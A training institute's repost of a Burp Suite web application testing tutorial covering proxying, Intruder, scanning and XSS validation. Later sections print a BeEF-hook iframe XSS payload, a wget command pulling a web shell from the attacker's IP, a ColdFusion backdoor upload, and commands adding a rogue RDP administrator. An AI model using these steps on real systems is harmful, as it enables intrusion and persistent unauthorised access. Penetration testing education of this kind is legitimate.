Ethical Hacking Institute Course in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: PrimalSec

Web Application Testing Overview:

Web application vulnerabilities offer a large amount of risk to enterprise systems.  Many web application vulnerabilities are a result of lack of input sanitization to the web application.  In short, web applications leverage some form of input from the user and may process that information to serve content on the web application, or retrieve data from other parts of the system. If input isn’t properly sanitized, an attacker can send in an non-standard input to misuse the web application. This post will focus heavily on Burp Suite and introduce how it can be leveraged to conduct assessments on web applications.

Burp Suite Overview:

Burp Suite has a large array of features, including but not limited to:

  • Interception Proxy: Designed to give the user control over requests sent to the server.
  • Repeater: The ability to rapidly repeat/modify specific requests.
  • Intruder: Feature that allows automation of custom attacks/payloads
  • Decoder: Decode and encode strings to various formats (URL, Base64, HTML, etc.)
  • Comparer: Can highlight differences between requests/responses
  • Extender: API to extend Burps functionality, with many free extensions available via the BApp store.
  • Spider and Discover Content feature: Crawls links on a web application, and the discover content can be used to dynamically enumerate unlinked content.
  • Scanner (Pro Only): Automated scanner that checks for web application vulnerabilities (XSS, SQLi, Command Injection, File Inclusion, etc.)

Getting Started:

Detailed help documentation on Burp can be found here:

http://portswigger.net/burp/help/suite_gettingstarted.html

Burp Suite can be launched via the CLI using the java –jar command. You can allocate the amount of memory you want for Burp to use with the switches “-Xmx”:

java -jar -Xmx1024m /path/to/burp.jar

b_1

Like most interception proxies Burp is driven through a GUI, but there are some options to automate Burp from the CLI by leveraging the Extender feature.

Once Burp Suite is started, it is recommended to define your target host in the scope. This allows you to control what is displayed in the site map, and other burp features. Scope can be defined by adding a target host, IP, or network range:

b_2

The Proxy tab displays the details related to Burp’s proxy, intercept options, and HTTP request history. Below you can see that “Intercept is on” so any request made from the browser will need to be manually forwarded through the Burp proxy:

b_3

The intercept feature will intercept ALL traffic sent from the browser, additional extensions such as FoxyProxy can be used to specify which URLs and IPs are blacklisted/whitelisted and therefore bypass the Burp intercept.

With Burp’s scope and proxy configured you can now begin to browse the web application using your browser and Burp, as you do the Site Map begins to populate under the Target menu. From this view you can see an overview of directory structure and resources within the web application. By right clicking on the URL or resource you have several options to invoke additional functionality, such as Burp’s spider or performing an active scan:

b_4

Quick Tip: To make it easier to focus on just the target web application, you can click the “Filter:” menu and choose to only show content that is within scope:

b_5

Activating Burp’s spider will crawl the linked content on the web application, going down a depth of 5 links down by default, but these options can be configured under the “Spider” tab. As you interact with the web application, all of the requests and responses will be logged under the “Proxy” tab. You can highlight a request to help it stand out, and even leave comments for later analysis:

b_6

Burp’s Engagement Tools:

Burp suite offers a number of useful features under it’s Engagement Tools (Right Click site in Target view > Engagement Tools).  From there you can choose “Analyze Target”, which gives you an idea of link count, parameter count, and static vs. dynamic content.  Knowing this information can be very useful for scoping the assessment.  The more links, parameters, and dynamic content the more injection points to fuzz.

In the screen shot below you can see some of the other features like “Schedule Task” which lets you schedule Burp suite to run an active scan.  This feature is especially useful if the client wants the automated testing performed at odd hours of the day.engagement_tools

Discovering Unlinked Content:

One issue you’ll face when performing web application tests is enumeration of unlinked content. This can be a time consuming method since it largely relies on brute force logic to make a request and see if the resource is there on the server. An example of this could be a “/tmp/” directory that isn’t linked anywhere in the web application, but if a request is made the content will be severed. To solve this problem we have a lot of options:

  • Leveraging Burp’s Discover Content feature.
  • Leverage another scanner that checks for some default resources (Nikto, w3af, ZAP, etc.).
  • Leverage DirBuster or Burp’s intruder to brute force resources based on a static list.

All these methods can be very time consuming and may not actually find anything, so depending on testing time and scope you may not be able to let DirBuster run for days. Normally this will run in the background while additional manual testing is performed.

Below is an example of invoking Burp’s Discover Content feature which attempts to dynamically enumerate unlinked content:

b_7

Burp’s Decoder and Comparer:

When you begin testing with web applications you’ll find that you very often need to decode or encode strings into different formats. This can be especially useful when trying to bypass simple filters to prevent web application attacks. Below is an example of Burp’s decoder performing URL encoding, although several additional options exist:

b_8

Burp’s Comparer feature allows you to quickly compare requests or responses to highlight the differences:

b_9

Burp’s Extender:

The Extender feature offers a powerful API to develop additional functionality with Burp using a scripting language. Many of the extensions are written in Python, and a offered for free via Burp’s App store. One very useful extension is Carbonator, which allows you to fully automate Burp from Spider > Scan > Report from the command-line. Below is a quick screen shot of some of the extensions that are available via the app store:

b_10

Burp’s Intruder:

Another option is leveraging Burp’s Intruder which can take a request and allows the user to define various injection points that can be modified to put in different payloads. One common use case will be to iterate through parameter values in a request to see how the web application responds (example: get /product.php?item=1) you may have intruder check 1-1000 and compare some of the differences in the responses. You can also define the resource that is being requested as the position to modify. Below we will demonstrate this by iterating through a common directory word list:

  1. Select a request and choose “Send to Intruder” this will prompt the following window under the “Intruder” tab. The highlighted area will be the section of the request that will be brute forced with the “Sniper” payload which goes through the list configured and makes the request:

b_11

  1. Next under the payload tab, you can load a word list to be used for the brute force discovery:

b_12

  1. To start the attack you select “Intruder > Start Attack”. The following results window will show the requests made and the HTTP status code. As we can see we were able to enumerate some additional resources that was missed from the spider:

b_13

In addition to using Burp, it is recommended to run an intermediate scanner in the background to check for some default configurations and resources. Below is an example of Nikto, but some additional scanner tools to consider are (ZAP, w3af, Grendal, etc.). As we can see, Nikto found additional interesting things to further investigate such as “/tmp/” and “/test/”:

b_14

Burp’s Automated Scanner:

After initial reconnaissance and mapping, we then want to start an active scan which will have Burp test the discovered content for various vulnerabilities. This largely works by Burp inputting content (HTML, JavaScript, SQL syntax, OS commands, etc.) and monitoring how the web application responds. As with any web application vulnerability scanner, Burp will report a number of false positives that will require manual validation. To start the active scanner, right click the URL or resource on the site map and select “Actively scan this host”, this will prompt the following Active scanning wizard:

b_15

Now web application scan times can vary greatly depending on the web application. Automated scans for web applications can range from a few hours, to several days in some instances. The link count enumerated during spidering is a good indicator of the potential duration of the scan. The above window shows 1515 links enumerated, though very few have parameters for testing input. Links without parameters will reduce the number of requests that Burp will make per link, so the scan time is lower.

Another key factor when considering actively scanning a web application is form submission. When u actively scanning the web application, you may potentially generate a large number of logs, tickets, jobs, etc. depending on the web application and functionality it provides to the user. This should be closely monitored to prevent causing a Denial of Service (DoS) condition if it is not in scope of the assessment.

Once the scan has started, the results and status will be visible by navigating to the “Scanner” tab within Burp:

b_16

As results begin to populate, you can start to review some of the results. Below we can see Burp extract multiple findings to further investigate:

b_17

Analyzing Scan Results and Manual Testing:

It is often a good idea to validate the findings resulting from a Burp scan to determine false positives and to fully understand the results. Start with selecting the finding, for example “Cross-site scripting (reflected)”, and then choose the request and response to see detailed information that influenced Burps interpretation of vulnerability. One of the first things to check with XSS is to repeat the request in the browser to see if the script runs. You can do that by right-clicking in the request body and choosing “Request in browser”:

b_18

Seeing the response in a browser can be helpful when determining if the finding was a true positive. Since XSS findings are related to code executing in a client browser, it’s important to validate the findings prior to relying on logic from the scanner.

Another frequently used feature of Burp is “Repeater”, commonly used when validating results or manually searching for additional findings. Simply right-click the request body and select “Send to Repeater”:

b_19

Within the Repeater interface, you can modify the request and quickly resend it at the web application.

b_20

Reflective XSS can be quickly tested with some sort of HTML/JavaScript injected into the payload that is parsed without input validation. Below is an example of modifying the XSS payload to simply “alert(“XSS”)”:

b_22

For an actual practical application of reflective XSS, you’d likely leverage an iframe as the payload to use in combination with spear phishing. Below is an example XSS payload you could use in place of “alert()”, so now it can load a 3rd party resource feeding a client-side exploit or BeEF hook:

<iframe height=”0″ width=”0″src=<BeEF_hook></iframe>

b_21

BeEF is a powerful way to take control over a victim browser through the use of JavaScript. Above you can see a victim browser that was hooked with BeEF using an XSS vulnerability. BeEF provides loads of functionality to perform on a victim browser, and even ties into Metasploit to deliver exploits.

XSS is often overlooked by many people with regards to web application security because you need to leverage with something else to get the end goal of a shell. One thing to note about XSS is that we have identified the web application isn’t properly filtering user input, and this could be just the first sign that may lead to many other vulnerabilities.

In this instance, we validated the XSS by sending the request to repeater and modifying the payload and showing the response in our browser, and showed how XSS could be leveraged to control a victim browser. Another nice feature about Burp’s scan results is you can modify the risk associated with a finding. You will undoubtedly come across some false positives when analyzing scan results, so Burp provides the user the ability to change a finding to a “False Positive”:

b_23

Burp is capable of fuzzing input with a variety of payloads, though it does miss some version specific vulnerabilities and configuration issues. This is common with any tool, and as a result, it is suggested to perform manual testing to validate results found by the tools as well as enumerate additional vulnerabilities within the web application.

A good first step to manual testing is enumeration of the technologies in use with the web application. The specific software and version information can lead you to additional resources to grab or vulnerabilities that might be present. Whatweb is a tool that is great at quickly giving you an idea of the technologies in use by the web application. Below we can see the command-line syntax for whatweb as well as the output:

b_24

At this point we would have likely already run whatweb, well before getting into running a full Burp scan, but we can see some very interesting information from whatweb’s output. In this instance, we see a ColdFusion web application, which provides us a starting point for our manual testing. Now that ColdFusion has been enumerated it is logical to check for the presence of administrative resources, such as “/CFIDE/administrator/”.

Manual Testing:

Burp can also be a great tool for performing manual testing on the web application. Normally this type of testing is performed through the assessment, and as more information is found from the various scans, it can be leveraged further with manual testing. The topic of manual testing can, and does fill books, this blog post will focus on some very basics. As you begin to browse the web application and review tool output ask yourself the following questions:

  1. Enumerate and research all the software versions possible. ColdFusion, WordPress, SharePoint, etc.
  • Research all software versions to check for any known vulnerabilities and common mis-configurations
  • Attempt to request additional resources associated with the technologies in use that might not be linked by the web application.
  1. Is the web application leveraging user input?
  • Look to modify parameter values, HTTP header fields, cookies, etc. to see how the web application responds.
  1. If you suspect some part of your request is presented on the screen, test for XSS. So if you browse the page and notice that your User-Agent is visible, attempt to replace your User-Agent with some HTML/JavaScript to test for XSS (“<script>alert(1)</script>”).
  1. Is your request being leveraged to perform a query on against a database? For example, if you notice a parameter called “id” and see that it takes in a numeric value, try placing a single tick ‘ or a double tick “ to attempt to generate a database error. This type of testing can lead to the identifying the presence of SQL injection.
  1. Is the web application leveraging any input to execute a command? Attempt to modify your input to append an additional command to the request and see if it’s processed successfully by the web application.

Obtain a Shell:

Web shells come in a variety of file formats and functionality.  You may be able to land a php shell (raw shell, meterpreter, etc.), a raw netcat shell, .asp shell, .jsp and so on.  The type of shell that can be utilize depends on the technology in use and the configuration.  For example, if you gained access to an Apache tomcat GUI you might be able to deploy a WAR backdoor.  If you have some RFI vulnerability in IIS running, you may try to upload an asp shell.

It’s also common that when you gain a shell, you are running with the permission of the web application service account which might not be able to execute commands in the current working directory.  For these reasons you may need to place the web shell in the /tmp/ directory (wget -O /tmp/shell.py http://<yourIp>/shell.py).  With regards to Remote Command Execution (RCE) its very common to need to have a null byte (%00) at the end of the request.

Then there are situations when a misconfiguration can lead to landing a web shell. Below we can see we have access to the ColdFusion management interface. If we navigate to it, this actually allows us to schedule a task and upload a (.cfm) backdoor. This is a critical finding, that many automated scanning tools completely miss:
b_25

This example is not likely to occur in the real world, but the point is to enumerate the versions of software leveraged by the web application and then conduct research to find any vulnerabilities. ColdFusion is ripe with many directory traversal and authentication bypass vulnerabilities. Creative Google searching and checking some exploit research resources like exploit-db can go a long way in this phase of testing.

Since we have access to the management interface the next logical step would be to schedule a task to pull over a (.cfm) backdoor and have it published on the web application. To schedule a task within ColdFusion it’s under the Debugging Options menu:

b_26

Next you’ll want to stand up a quick web server on another resource to allow the victim web application to pull the backdoor over. I find leveraging Python to stand up a quick web server is very helpful:

python -m SimpleHTTPServer 80

We can then configure and run the scheduled task to pull over and publish the backdoor. You will want to be sure to check the “Publish” checkbox, and you can enumerate the file system directory structure from the server settings summary on the left hand side:

b_27

After we run the scheduled task you can monitor your Python web server to see the victim server request the backdoor. Then you can navigate to the resource on the web application to interact with the backdoor to execute commands on the OS:

b_28

We can execute a “whoami” command to see what privileges we have on the web application:

b_29

Executing as “nt authority\system” means we can begin to make some modifications, adding a user and turning off the firewall. We will add a user with the following commands:

net user jobin password /ADD

net user localgroup Administrators jobin /ADD

net localgroup “Remote Desktop Users” jobin /ADD

Now with the firewall disabled and user added through the (.cfm) shell we can RDP over to the victim system to have terminal access:

b_30

Conclusion:

A common source of web application vulnerabilities is lack of user input sanitization. Web application scanners work by trying to take advantage of the lack of input sanitization by making requests that include: code, syntax, local/remote resources, etc. Web application testing is a very advanced topic, this blog post just focused on some basics with an introduction to Burp Suite.

www.extremehacking.org
Cyber Suraksha AbhiyanCEHv9, CHFI, ECSAv9, CAST, ENSA, CCNA, CCNA SECURITY,MCITP,RHCE,CHECKPOINT, ASA FIREWALL,VMWARE,CLOUD,ANDROID,IPHONE,NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNECertified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-IndiaEthical Hacking Course in Pune-India